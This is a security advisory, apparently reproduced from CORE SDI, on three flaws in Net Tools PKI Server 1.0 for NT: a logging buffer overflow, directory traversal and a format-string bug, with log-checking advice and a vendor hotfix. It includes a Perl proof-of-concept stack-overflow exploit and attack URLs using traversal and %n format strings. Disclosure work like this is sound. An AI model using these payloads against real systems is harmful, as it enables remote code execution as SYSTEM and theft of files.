COMMAND

    PKI Server

SYSTEMS AFFECTED

    Net Tools PKI server 1.0 for NT (including hotfix 1 and 2)

PROBLEM

    Following  is  based  on   CORE  SDI  Security  Advisory.    While
    investigating the exploitability of  a buffer overflow in  the Net
    Tools PKI Server from Network Associates Inc. SDI discovered three
    new vulnerabilities not fixed by hotfix 1 released to fix problems
    reported by Jim Stickley from Garrison Technologies Inc:

        http://oliver.efri.hr/~crv/security/bugs/Others/pki.html

    Problem #1: Buffer overflow in strong.exe
    =========================================
    A buffer  overflow in  the web  server component  of the Net Tools
    PKI server allows a remote  attacker to execute arbitrary code  as
    SYSTEM on the machine running it.

    To  determine  whether  anyone  has  attempted  to  exploit   this
    vulnerability,    check    the    enroll-access.log    and     the
    admin-access.log  files  in  the  WebServer/logs directory of your
    Net Tools  PKI Server  installation.   Search for  any log entries
    which are excessively  long (greater than  500 characters).   Each
    log  entry  can  then  be  examined  to  see the IP address of the
    computer that submitted the request.

    Remote  unauthenticated  access  to  the  PKI Server, execution of
    arbitrary  commands  as  the  user  running  the enrollment server
    (System).

    Strong.exe  is  the  web  server  component  of the PKI Server, it
    services requests over SSL  on ports 443/tcp, 444/tcp  and 445/tcp
    (default ports).  While  connections to port 443/tcp  require both
    client and  server autentication  using certificates,  connections
    to port 444/tcp requires  no client authentication, therefore  any
    user with network connectivity to  the PKI server can connect  via
    HTTPS to that port.

    The service running on  port 443/tcp is called  the Administrative
    Web Server and  its therefore obvious  the requirement for  mutual
    authentication.   The  service  running  on  port  444/tcp  is the
    Enrollment  Web  Server  and  does  not  require  a  client   side
    certificate by  default.   Both web  servers are  actually Virtual
    servers serviced by strong.exe

    A buffer overflow  is present in  the function that  generates log
    data, that allows to overwrite the stack using user supplied  data
    passed to the server as an URL in the HTTPS request.

        https://host:444/<2965 'A' chars>

        EAX=66206465 EBX=00F3E1C0  ECX=01FFF224 EDX=20414141
        EDI=00000000 EBP=01FFFE60 ESP=01FFF258 EIP = 0040977B

    The value  in EAX  is part  of the  string (DATE+PATH+FILE+REASON)
    that gets logged, detailing the reason for the failure.  Since  it
    is  not  a  valid  address,  a  segmentation  fault is rised a few
    instructions after the overwrite:

        mov ecx,[eax+000000E4]

    The above does  not overwrite EIP  and it kills  the server before
    its overwritten, but a slight variation of it will let an attacker
    overwrite EBP, EIP and  by carefully overwriting local  variables,
    control the execution of arbitrary code on the target machine.

    A sample, proof of concept perl script exemplifies this:

        #!/usr/bin/perl
        # NAI NetTools PKI SERVER 1.0 - Long URL Stack Overflow Exploit
        # Replace host and port an create the html file:
        #./pkiluso.pl > test.html
        #Open the html in a SSL compatible browser and click on the link. puf!
        #Juliano Rizzo (c) 2000 juliano@core-sdi.com
        
        $host = "localhost";
        $port = "444";
        $shell_code= "\x90\x90\x90\x90";
        
        #We can set the values of EIP and EBP, our code is on the stack
        #and in 0x01613A2E.
        $eip = "\x2E\x3A\x61\x01";#0x01613A2E (URL readed from socket)
        #$eip = "\x64\x83\x40%00";#0x00408364 (CALL EBP)
        $ebp = "\xCB\xF2\01\x02"; #0x0200F2CB (trunca el string por el 00)
        $noplen = (2965 - length($shell_code));
        print "<html><body><a href=\"https://".$host.":".$port."/";
        print "\x90"x$noplen;
        print
        $shell_code.$ebp.$eip."\x18\x6B\x62\x01\x18\x6B\x62\x01\x18\x6B\x62\x01".
        "\">Click here to exploit.!</a></body></html>";

    Problem #2: Directory traversal vulnerability
    =============================================
    The default installation of Net  Tools PKI server allows a  remote
    attacker to view and download any file residing on the server.  To
    determine   whether   anyone   has   attempted   to  exploit  this
    vulnerability,    check    the    enroll-access.log    and     the
    admin-access.log files in the WebServer/logs directory of your Net
    Tools  PKI  Server  installation.   Search  for  any  log  entries
    containing "..\" within them. Each log entry can then be  examined
    to see the IP address of the computer that submitted the  request.

    Remote unauthenticated access to any file on the PKI server.

    By specifying '..\'  in  HTTPS requests to the enrollment  server,
    an  attacker   can  navigate   the  server's   file  system    and
    view/download  any  file  if  its  name  is known.  By default the
    enrollment server uses

        \Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server

    as  the  Web  Root  directory,  if  a  file  name  is  known  (ie.
    autoexec.bat) the attacker just needs to supply the remaining path
    components to access it:

        https://host:444/..\..\..\..\..\autoexec.bat

    will  display  the  contents  of  the  file  in the browser.  If a
    filename is  not known,  the web  server will  reveal its web root
    directory in an error messages shown to the client:

        https://host:444..\..\pirulo.pdf will result in:

        File Not Found

        The requested URL /..\..\pirulo.pdf was not found on this server.

    There was  also some  additional information  available about  the
    error:

        [Tue Jun 27 19:47:33 2000] access to C:\Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server/..\..\pirulo.pdf failed for a.b.c.d, reason: File does not exist

    Problem #3: Format strings with user supplied data
    ==================================================
    The Net Tools PKI Server fail to validate properly the data passed
    as arguments to the server's logging routines and allows a  remote
    attacker to execute arbitary code as SYSTEM on the machine running
    it.

    Remote  unauthenticated  access  to  the  PKI Server, execution of
    arbitrary  commands  as  the  user  running  the enrollment server
    (System).

    The user supplied URL is processed by Strong.exe and if the  .XUDA
    extension  is  found,  the  request  is forwarded to XUDAD.EXE for
    futher processing.   Prior to  this "hand-off"  the URL  string is
    parsed, filtered for metacharacters and passed to a function  that
    logs the request.  Somewhere  along the processing path, the  user
    supplied data  becomes the  format string  for a  formatted output
    function similar to  the ANSI C  sprintf().  This  allows a remote
    attacker  to  provide  data  that  will  force  that function into
    overwritting arbitrary  portions of  the process  memory and cause
    either a denial of service  attack or the execution of  arbittrary
    code.  To exemplify this, the following URL will cause a DoS:

        https://host:444/%25%25s.xuda

    Notice that the hex value 0x25 represent the ASCII character  '%',
    thus  the  URL  string  will  get  converted  to  "%%s.xuda"   and
    subsequentelly to "%s.xuda".  A more elaborated attack, might  try
    to overwrite the return address  on the stack to force  the server
    into executing arbitrary code.  Proof of concept, sample URL:

        https://host:444/xxx%3c%b9%ff%01%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25x%25n.xuda

SOLUTION

    Network Associates Inc.  has released Hotfix  3 for the  Net Tools
    PKI Server.  It corrects the  three problems.  It can be  obtained
    from:

        http://www.nai.com/asp_set/download/upgrade/find.asp

    Or contact Network Associates Technical support at 1-800-722-3709.